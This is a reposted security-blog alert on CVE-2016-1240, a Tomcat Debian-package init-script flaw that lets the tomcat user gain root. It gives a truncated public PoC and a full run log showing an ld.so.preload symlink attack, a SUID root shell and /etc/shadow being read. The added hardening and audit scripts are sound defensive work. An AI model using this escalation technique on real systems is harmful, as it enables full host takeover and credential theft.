Vulnerability alert: Tomcat local privilege escalation disclosed (CVE-2016-1240, PoC attached)
On 1 October a local privilege escalation vulnerability, CVE-2016-1240, was disclosed in the Tomcat packages shipped by Debian and Ubuntu. Starting from nothing more than the low-privileged tomcat user, an attacker can use it to obtain root on the system. The vulnerability is not hard to exploit, so affected users should pay particular attention.
Author's QQ: 381493251
Blog: www.abcdocker.com
WeChat public account: abcdocker
Abcdocker discussion group: 454666672
If you run into problems you can ask in the group; we are a group that likes to help!
Tomcat is a servlet container, a server that runs Servlet/JSP web applications. It is often deployed behind Apache httpd, which is why it is sometimes described as an "extension" of Apache, but it is a separate program and runs perfectly well on its own.

Vulnerability ID: CVE-2016-1240

Affected range (Debian package versions):
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected. The flaw is in the packaging, not in upstream Tomcat, so a Tomcat unpacked from the Apache tarball does not carry the init script in question.

Fix:
The Debian security team has fixed the affected packages; update to the latest Tomcat package provided by your distribution.

Overview:
On Debian-based Linux systems administrators usually install software with apt-get. CVE-2016-1240 lies in the Tomcat deb packages: installing Tomcat from the deb package also installs a start-up script, /etc/init.d/tomcat* (tomcat6, tomcat7 or tomcat8), which runs as root. Through that script an attacker who holds the low-privileged tomcat user can obtain root on the system. The relevant lines of the script are:
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
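A hardened version of the sequence just quoted, written for this post as an added example (it is not the Debian package's own script and not code from the advisory). It keeps the package's intent, a log file owned by the service user, but treats a symlink or any other non-regular file at the log path as tampering and stops, creates the file only with O_EXCL semantics, and chowns it with -h so a link is never dereferenced. The function name prepare_log and its two-argument interface are this example's own; inside the init script it would be called with the CATALINA_BASE and TOMCAT7_USER variables the script already defines.

```shell
#!/bin/sh
# Added example, not the Debian package's own code: a hardened replacement for
# the init-script sequence quoted above, which runs as root and does
#     touch "$CATALINA_BASE"/logs/catalina.out
#     chown $TOMCAT7_USER "$CATALINA_BASE"/logs/catalina.out
# and therefore follows any symlink the tomcat user planted at that path.
# The function name and the two-argument interface are this example's own.

# prepare_log LOGFILE USER
# Ensures LOGFILE is a regular, non-symlink file owned by USER.
# Returns 0 on success; returns 1 and changes nothing if the path looks tampered with.
prepare_log() {
    logfile=$1
    owner=$2

    # A symlink at the log path is the attack itself (catalina.out -> /etc/ld.so.preload
    # or /etc/default/locale). Never dereference it, and do not delete it either, so an
    # operator can inspect what it pointed to.
    if [ -L "$logfile" ]; then
        echo "prepare_log: refusing symlink $logfile -> $(readlink "$logfile")" >&2
        return 1
    fi
    # Anything else that is not a plain file (fifo, device, directory) is also suspect.
    if [ -e "$logfile" ] && [ ! -f "$logfile" ]; then
        echo "prepare_log: $logfile exists and is not a regular file" >&2
        return 1
    fi
    # Create only if absent, with noclobber (set -C) so the shell opens the path
    # O_EXCL: a link raced in between the check above and this line makes the
    # redirection fail instead of truncating the link target.
    if [ ! -e "$logfile" ]; then
        ( set -C; : > "$logfile" ) 2>/dev/null || {
            echo "prepare_log: could not create $logfile" >&2
            return 1
        }
    fi
    # Re-check after creation, then chown only a file that is fresh (root-owned)
    # or already belongs to the service user; -h never follows a link.
    if [ -L "$logfile" ] || [ ! -f "$logfile" ]; then
        return 1
    fi
    cur=$(stat -c %U "$logfile" 2>/dev/null || ls -ld "$logfile" | awk '{print $3}')
    case "$cur" in
        root|"$owner") chown -h "$owner" "$logfile" ;;
        *) echo "prepare_log: $logfile owned by $cur, not root/$owner; leaving it" >&2
           return 1 ;;
    esac
}

# Drop-in use inside the init script (CATALINA_BASE / TOMCAT7_USER as set there):
#   prepare_log "$CATALINA_BASE/logs/catalina.out" "$TOMCAT7_USER" || exit 1
```

Refusing rather than unlinking the planted symlink is deliberate: the link is evidence of an intrusion, and deleting it would hide it. The check can only be as strong as the directory it runs in; the demonstration further down creates the link as tomcat7 inside /var/log/tomcat7, so the directory itself is writable by the service user, and the function must assume every component under it is attacker-controlled.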
A local attacker running as the tomcat user (a foothold obtained, for example, through a vulnerable web application deployed in Tomcat) replaces catalina.out with a symbolic link to an arbitrary system file. The init script runs as root, and both touch and chown follow symlinks, so the next time the service is restarted the link target is created if it does not yet exist and its owner is changed to the tomcat user. Pointing the link at /etc/ld.so.preload, as the PoC below does, turns this into root: the attacker can now write the path of a shared library into the file, and the next setuid binary that starts (sudo in the PoC) loads that library with root privileges. The trigger is a restart, not the running service: the attacker either waits for one or kills the Tomcat process (which the tomcat user may do) in the hope that an administrator or a watchdog restarts it.

PoC:
#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can be used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
    # Cleanup
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $TOMCATLOG
    touch $TOMCATLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload 2>/dev/null
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
    echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
    cleanexit 0
}

#intro
echo -e "
# [The listing is cut off here in the original post; the complete script is in the advisory linked in the header above.]
PoC run example:
tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii  libtomcat7-java   7.0.68-1ubuntu0.1   all   Servlet and JSP engine -- core libraries
ii  tomcat7           7.0.68-1ubuntu0.1   all   Servlet and JSP engine
ii  tomcat7-common    7.0.68-1ubuntu0.1   all   Servlet and JSP engine -- common files
tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240

Discovered and coded by:
Dawid Golunski
http://legalhackers.com

[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh

[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh

Please tell me you're seeing this too ;)

[+] Executing the rootshell /tmp/tomcatrootsh now!

tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit
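The run above leaves artefacts that an administrator or responder can look for: catalina.out turned into a symlink, /etc/ld.so.preload created with the tomcat user as owner and pointing at a library in /tmp, and, in the deferred mode described in the script header, /etc/default/locale owned by the tomcat user. Note also that the PoC's cleanexit function only truncates /etc/ld.so.preload, so after a "clean" run the file still exists, empty but tomcat-owned. The following audit script is an added example (not from the post, the advisory or the PoC) that checks a host for those indicators plus the PoC's default file names. The paths are the Debian/Ubuntu defaults for the tomcat6/7/8 packages, and the audit_host function with its optional prefix argument is this example's own.

```shell
#!/bin/sh
# Added example (not from the original post or the advisory): a host audit for
# the artefacts that the two exploitation modes described above leave behind.
# Paths are the Debian/Ubuntu defaults for the tomcat6/7/8 packages and the
# PoC's own default file names; adjust them if your layout differs (assumption).

# Owner name and octal mode of a path, with a fallback for non-GNU stat.
file_owner() { stat -c %U "$1" 2>/dev/null || ls -ld "$1" | awk '{print $3}'; }
file_mode()  { stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"; }

# audit_host [PREFIX]
# PREFIX is normally empty; it lets the checks run against a test tree.
# Prints one line per finding and returns the number of findings (0 = clean).
audit_host() {
    root=${1:-}
    findings=0

    # 1. catalina.out replaced by a symlink: the first step of both modes.
    for log in "$root/var/log/tomcat6/catalina.out" \
               "$root/var/log/tomcat7/catalina.out" \
               "$root/var/log/tomcat8/catalina.out"; do
        if [ -L "$log" ]; then
            echo "FINDING: $log is a symlink -> $(readlink "$log")"
            findings=$((findings + 1))
        fi
    done

    # 2. Active mode: /etc/ld.so.preload created by the init script with the
    #    tomcat user as owner, then filled with the attacker's library. The PoC's
    #    cleanup only empties it, so flag it if it exists and is non-empty OR not
    #    owned by root.
    pre="$root/etc/ld.so.preload"
    if [ -e "$pre" ]; then
        owner=$(file_owner "$pre")
        if [ "$owner" != root ] || [ -s "$pre" ]; then
            echo "FINDING: $pre present (owner=$owner, $(wc -c < "$pre" | tr -d ' ') bytes)"
            findings=$((findings + 1))
        fi
    fi

    # 3. Deferred mode: /etc/default/locale handed to the tomcat user, later
    #    executed by the /etc/cron.daily/tomcatN job as root. Flag it if it is
    #    not root-owned or is group/world writable.
    loc="$root/etc/default/locale"
    if [ -e "$loc" ]; then
        owner=$(file_owner "$loc")
        mode=$(file_mode "$loc")
        case "$mode" in
            *[2367][0-7]|*[2367]) writable=yes ;;   # write bit set for group or other
            *) writable=no ;;
        esac
        if [ "$owner" != root ] || [ "$writable" = yes ]; then
            echo "FINDING: $loc owner=$owner mode=$mode"
            findings=$((findings + 1))
        fi
    fi

    # 4. Leftovers from the published PoC (its default BACKDOORPATH/PRIVESCLIB/PRIVESCSRC).
    for f in "$root/tmp/tomcatrootsh" "$root/tmp/privesclib.so" "$root/tmp/privesclib.c"; do
        if [ -e "$f" ]; then
            echo "FINDING: PoC artefact $f"
            findings=$((findings + 1))
        fi
    done

    return $findings
}

# Usage on a live host: sudo sh audit.sh --run   (exit status = number of findings)
if [ "${1:-}" = "--run" ]; then
    audit_host ""
    exit $?
fi
```

The checks are deliberately coarse, since an attacker who has already run the exploit can rename the /tmp artefacts; the ownership and mode checks on the two root-owned configuration files are the durable signal, because the init script and the cron job create or use them regardless of what the attacker names things.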
*Compiled by: 漏洞盒子 security team; source: Twitter; reprints please credit FreeBuf.COM. Original: http://www.freebuf.com/vuls/115862.html
